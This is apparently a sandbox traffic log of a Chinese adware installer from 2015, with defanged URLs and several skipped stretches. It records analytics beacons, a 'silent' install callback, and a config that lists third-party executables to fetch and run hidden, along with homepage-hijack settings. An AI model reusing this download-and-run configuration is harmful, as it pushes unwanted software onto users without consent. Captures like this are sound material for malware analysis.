Content-Type: application/x-javascript
Last-Modified: Mon, 05 Jan 2015 07:54:16 GMT
Accept-Ranges: bytes
ETag: "14dbbcdbc28d01:14d7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:51:21 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?16246473" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="hXXp://icon.ajiang.net/icon_9.gif" style="border:none" /></a>\n');..var a6473tf="51la";var a6473pu="";var a6473pf="51la";var a6473su=window.location;var a6473sf=document.referrer;var a6473of="";var a6473op="";var a6473ops=1;var a6473ot=1;var a6473d=new Date();var a6473color="";if (navigator.appName=="Netscape"){a6473color=screen.pixelDepth;} else {a6473color=screen.colorDepth;}..try{a6473tf=top.document.referrer;}catch(e){}..try{a6473pu =window.parent.location;}catch(e){}..try{a6473pf=window.parent.document.referrer;}catch(e){}..try{a6473ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6473ops=(a6473ops==null)?1: (parseInt(unescape((a6473ops)[2])) 1);var a6473oe =new Date();a6473oe.setTime(a6473oe.getTime() 60*60*1000);document.cookie="AJSTAT_ok_pages=" a6473ops ";path=/;expires=" a6473oe.toGMTString();a6473ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6473ot==null){a6473ot=1;}else{a6473ot=parseInt(unescape((a6473ot)[2])); a6473ot=(a6473ops==1)?(a6473ot 1):(a6473ot);}a6473oe.setTime(a6473oe.getTime() 365*24*60*60*1000);document.cookie="AJSTAT_ok_times=" a6473ot ";path=/;expires=" a6473oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a6473ops=-1;a6473ot=-1;}}catch(e){}..a6473of=a6473sf;if(a6473pf!=="51la
<<< skipped >>>
GET /icon_9.gif HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.ajiang.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=14400
Content-Length: 893
Content-Type: image/gif
Last-Modified: Fri, 26 May 2006 14:28:04 GMT
Accept-Ranges: bytes
ETag: "0b24a99d080c61:1566"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:51:20 GMT
Connection: close
GET /hezi/xxurl.html?iexplore.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.xiaoxinrili.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 14 Jan 2015 11:51:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Vary: Accept-Encoding
Cache-Control: max-age=1200
Last-Modified: Fri, 26 Sep 2014 06:40:17 GMT
Cache-by-CoreNode: HIT From cha-ld-mgslb-gdzh-core1-mnd3
Content-Encoding: gzip
Cache-by-Node: HIT From cha-ld-gdmzh-cs1-nd33
GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Host: dl.wandoujia.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: Tengine/1.4.6
Date: Wed, 14 Jan 2015 11:51:34 GMT
Content-Type: text/html
Content-Length: 266
Connection: keep-alive
Location: hXXp://dl.cdn.wandoujia.com/files/conn_engine/2.69.0.5490.zip
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</html>..
GET /conn_engine_config_ini.php?ver=0&vendor=100000511 HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Host: cfg.pub.wandoujia.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/1.5.2
Date: Wed, 14 Jan 2015 11:51:33 GMT
Content-Type: text/html
Content-Length: 91
Connection: keep-alive
Pragma: public
Cache-Control: maxage=3600
Expires: Wed, 14 Jan 2015 12:51:33 GMT
Last-Modified: Wed, 08 Oct 2014 11:39:08 GMT
Etag: fec081d9f595daf7b341a9c631b6b888
[config].url=hXXp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip.version=2.69.0.5490.
GET /metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=inst HTTP/1.0
Host: count.xiaoxinrili.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: AppName:........; Compiled:201412311429; WinVer:5.01.2600 paX86; AdapterCount:1;
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=jjnr74rehkj30evdm5ja63ssa1; expires=Wed, 14-Jan-2015 13:49:37 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=jjnr74rehkj30evdm5ja63ssa1; expires=Wed, 14-Jan-2015 13:49:37 GMT; path=/; httponly
Cache-Control: private, must-revalidate
Date: Wed, 14 Jan 2015 11:49:37 GMT
pragma: no-cache
expires: -1
0..
GET /ini/read.php?t=slt&d=2014123114&c= HTTP/1.0
Host: ini.xiaoxinrili.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; KngStr_IAM)
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 14 Jan 2015 11:50:41 GMT
Content-Type: text/plain; charset=GBK
Content-Length: 5467
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
X-Cache-CFC: EXPIRED - 1421236241.157 - httpGETini.xiaoxinrili.com/ini/read.php?t=slt&d=2014123114&c=
[Main]..wpFinished=..Ads=..MainPage=..WS=1..NoneUI=Lnk_Hao123|Lnk_ahxy..pptv_NoneUI=..Un_Ads=..Un_MainPage=..Un_NoneUI=Lnk_Hao123|Lnk_cq....[Lst]..NoneUI=1..Un_NoneUI=2..Channel1=smx1119,t10315,t10350,smx1208,t10352,zjm0104..List1=..Channel2=smx1119,t10315,t10350,smx1208,t10352,zjm0104..List2=..[Mp]..MainCap1=....360......MainPage1=Url_1..MainLock1=0..WhiteList1=Url_2,Url_3,Url_4,Url_5..MainCap0=....360......MainPage0=Url_0..MainLock0=0..WhiteList0=Url_2,Url_3,Url_4,Url_5..[Url]..Url0=VVV.z7755.com..Url1=VVV.z7755.com..Url2=i1616.com..Url3=VVV.z7755.com..Url4=z8822.com..Url5=hXXp://hao.360.cn/?src=lm&ls=n162f37fb94..Url6=www.z7755.com..[Exe]..Cap1=................Url1=hXXp://hezi.91danji.com/bao/xx/WanDouJia_capher105_kb.exe..File1=WanDouJia_capher105_kb.exe..Param1=-hide....Cap5=....37wan..............Url5=hXXp://d.wanyouxi7.com/37wan/37cs_wd/901373/Setup_37wanWd.exe..File5=Setup_37wanWd.exe..Param5=..Cap6=FM..................Url6=hXXp://down.yinyue.fm/open/setup_2997.exe..File6=setup_2997.exe..Param6=..Cap7=..........Url7=hXXp://lkdownload.lkgame.com/SU_lk78_setup_LG0704.exe..File7=SU_lk78_setup_LG0704.exe..Param7=..Cap8=7k7k..........Url8=hXXp://box.7k7k.com/manage/download_box.php?from=xiaoxin01..File8=QKGameHall_5.6.4.2_xiaoxin01.exe..Param8=/YLXNotShowUI..Cap10=................360..........Url10=hXXp://down.360safe.com/p/360Inst_oemqd2.exe..Exe10=360Inst_oemqd2.exe..Param10=..Cap11=doyo..........Url11=hXXp://soft.doyo.cn/soft/doyo_3066_s.exe..File11=doyo_3066_s.exe..Param11=....Cap12=1666......Url12=http:
<<< skipped >>>
GET /stat.php?id=5554906&web_id=5554906 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s14.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:11:36 GMT
Last-Modified: Wed, 14 Jan 2015 11:11:36 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 2390
X-Cache: HIT TCP_MEM_HIT dirn:6:444083222
X-Swift-SaveTime: Wed, 14 Jan 2015 11:11:36 GMT
X-Swift-CacheTime: 5400
Via: cache6.de1[0,200-0,H], cache8.de1[0,0]
<<< skipped >>>
GET /stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=531066514 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs10.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /stat.php?id=4881483&web_id=4881483 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/qian.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s19.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:30 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:30 GMT
Cache-Control: max-age=5400,s-maxage=5400
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:31 GMT
X-Swift-CacheTime: 5399
Via: cache7.de1[1596,200-0,M], cache5.de1[1597,0]
2758..(function(){function k(){this.c="4881483";this.R="z";this.N="";this.K="";this.M="";this.r="1421236290";this.P="hzs19.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=4881483");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c
<<< skipped >>>
GET /stat.php?id=4878044&web_id=4878044 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s19.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:01:38 GMT
Last-Modified: Wed, 14 Jan 2015 11:01:38 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 2993
X-Cache: HIT TCP_MEM_HIT dirn:7:784156534
X-Swift-SaveTime: Wed, 14 Jan 2015 11:01:38 GMT
X-Swift-CacheTime: 5400
Via: cache1.de1[0,200-0,H], cache5.de1[1,0]
(function(){function k(){this.c="4878044";this.R="z";this.N="";this.K="";this.M="";this.r="1421233298";this.P="hzs19.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=4878044");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[
<<< skipped >>>
GET /InstProtect.txt HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Nov 2014 07:54:35 GMT
Accept-Ranges: bytes
ETag: "cbc3f6fce3d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:37 GMT
Content-Length: 1
0
GET /core.php?web_id=4878044&t=z HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:33 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:33 GMT
Expires: Wed, 14 Jan 2015 12:06:33 GMT
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:33 GMT
X-Swift-CacheTime: 900
Via: cache10.de1[1721,200-0,M], cache3.de1[1722,0]
!function(){var p,q,r,a=encodeURIComponent,b="4878044",c="",d="",e="online_v3.php",f="hzs19.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();
<<< skipped >>>
GET /core.php?web_id=1253322244&t=z HTTP/1.1
Accept: */*
Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:39 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:39 GMT
Expires: Wed, 14 Jan 2015 12:06:39 GMT
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:39 GMT
X-Swift-CacheTime: 900
Via: cache9.de1[1208,200-0,M], cache3.de1[1209,0]
!function(){var p,q,r,a=encodeURIComponent,b="1253322244",c="",d="",e="online_v3.php",f="z9.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();
<<< skipped >>>
GET /core.php?web_id=5614889&t=z HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 749
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:49:49 GMT
Last-Modified: Wed, 14 Jan 2015 11:49:49 GMT
Expires: Wed, 14 Jan 2015 12:04:49 GMT
Age: 126
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:49:49 GMT
X-Swift-CacheTime: 900
Via: cache5.de1[0,200-0,H], cache3.de1[0,0]
!function(){var p,q,r,a=encodeURIComponent,b="5614889",c="",d="",e="online_v3.php",f="z12.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();
<<< skipped >>>
GET /stat.php?id=1253322244 HTTP/1.1
Accept: */*
Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s5.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:51:37 GMT
Last-Modified: Wed, 14 Jan 2015 11:51:37 GMT
Cache-Control: max-age=5400,s-maxage=5400
Cache-Control: max-age=5400,s-maxage=5400
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:38 GMT
X-Swift-CacheTime: 5399
Via: cache10.de1[1016,200-0,M], cache6.de1[1017,0]
2d3..(function(){function k(){this.c="1253322244";this.R="z";this.N="";this.K="";this.M="";this.r="1421236297";this.P="z9.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1253322244");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=esc..2488..ape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_acco
<<< skipped >>>
GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Host: dl.cdn.wandoujia.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine/1.4.6
Date: Wed, 14 Jan 2015 11:51:35 GMT
Content-Type: text/html
Content-Length: 266
Connection: keep-alive
Location: hXXp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.5490.zip
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</html>..
GET /c.php?id=30085361&l=3 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: w.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10074
Connection: keep-alive
Date: Wed, 14 Jan 2015 10:54:51 GMT
Last-Modified: Wed, 14 Jan 2015 10:54:51 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 3385
X-Cache: HIT TCP_MEM_HIT dirn:6:242871715
X-Swift-SaveTime: Wed, 14 Jan 2015 10:54:52 GMT
X-Swift-CacheTime: 5399
Via: cache5.de1[0,200-0,H], cache2.de1[0,0]
(function(){function k(){this.c="30085361";this.R="q";this.N="";this.K="3";this.M="";this.r="1421232891";this.P="hqs5.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=30085361");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if(
<<< skipped >>>
GET /ico/Icon_1.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA1253322244=307117902-1421236297-|1421236297
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 14 Jan 2015 11:51:42 GMT
Content-Type: image/x-icon
Content-Length: 97527
Cache-Control: max-age=1200
Last-Modified: Sat, 31 Aug 2013 07:53:06 GMT
Cache-by-CoreNode: HIT From cha-ld-mgslb-sdwf-core1-mnd1
Cache-by-Node: HIT From cha-ld-lnmas-cs1-nd4
Accept-Ranges: bytes
<<< skipped >>>
GET /stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=2027361058 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs23.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:22 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /daohang/sj.xml HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
